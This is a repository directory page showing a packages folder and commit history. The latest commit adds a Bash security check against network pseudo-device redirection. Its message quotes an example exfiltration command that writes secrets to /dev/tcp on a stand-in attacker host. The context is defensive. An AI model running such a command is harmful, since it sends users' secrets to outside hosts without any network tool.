versun/claude-code
1
0
Fork 0
mirror of https://github.com/claude-code-best/claude-code.git synced 2026-06-15 12:55:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
327658979a8bda9505dbc175fbb0e6230796e61e
claude-code/packages
History
claude-code-best 327658979a fix: 添加 /dev/tcp /dev/udp 网络伪设备重定向安全检测 
Bash 支持 /dev/tcp/host/port 和 /dev/udp/host/port 伪设备路径,
攻击者可通过重定向实现网络数据泄露而无需任何网络工具:
  echo "secrets" > /dev/tcp/evil.com/4444

新增 validateNetworkDeviceRedirect 安全验证器,在 bashSecurity.ts
的同步和异步验证器列表中均注册。同时补全了反斜杠转义和复合命令
安全场景的测试覆盖(42 个测试用例)。

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-04-28 14:58:34 +08:00
..
@ant
fix: resolve dependency audit findings precisely (#361)
2026-04-26 19:49:54 +08:00
acp-link
fix: resolve dependency audit findings precisely (#361)
2026-04-26 19:49:54 +08:00
agent-tools
feat: 重构供应商层次 (#286)
2026-04-17 09:33:14 +08:00
audio-capture-napi
fix: 修复构建后 vendor 二进制路径解析错误(ripgrep/audio-capture)
2026-04-25 14:46:02 +08:00
builtin-tools
fix: 添加 /dev/tcp /dev/udp 网络伪设备重定向安全检测
2026-04-28 14:58:34 +08:00
color-diff-napi
fix: 将 highlight.js 改为静态导入以兼容 Bun --compile 模式
2026-04-23 18:47:31 +08:00
image-processor-napi
Fixture/langfuse record auto mode data error (#308)
2026-04-20 13:30:05 +08:00
mcp-client
feat: 重构供应商层次 (#286)
2026-04-17 09:33:14 +08:00
modifiers-napi
feat: 添加 napi 包测试覆盖与 stub 改进
2026-04-22 22:38:10 +08:00
remote-control-server
fix: resolve dependency audit findings precisely (#361)
2026-04-26 19:49:54 +08:00
url-handler-napi
feat: 添加 napi 包测试覆盖与 stub 改进
2026-04-22 22:38:10 +08:00
weixin
feat: 接入内建 weixin channel(同 #301 重构版本) (#303)
2026-04-19 21:33:27 +08:00
tsconfig.json
feat: 重构供应商层次 (#286)
2026-04-17 09:33:14 +08:00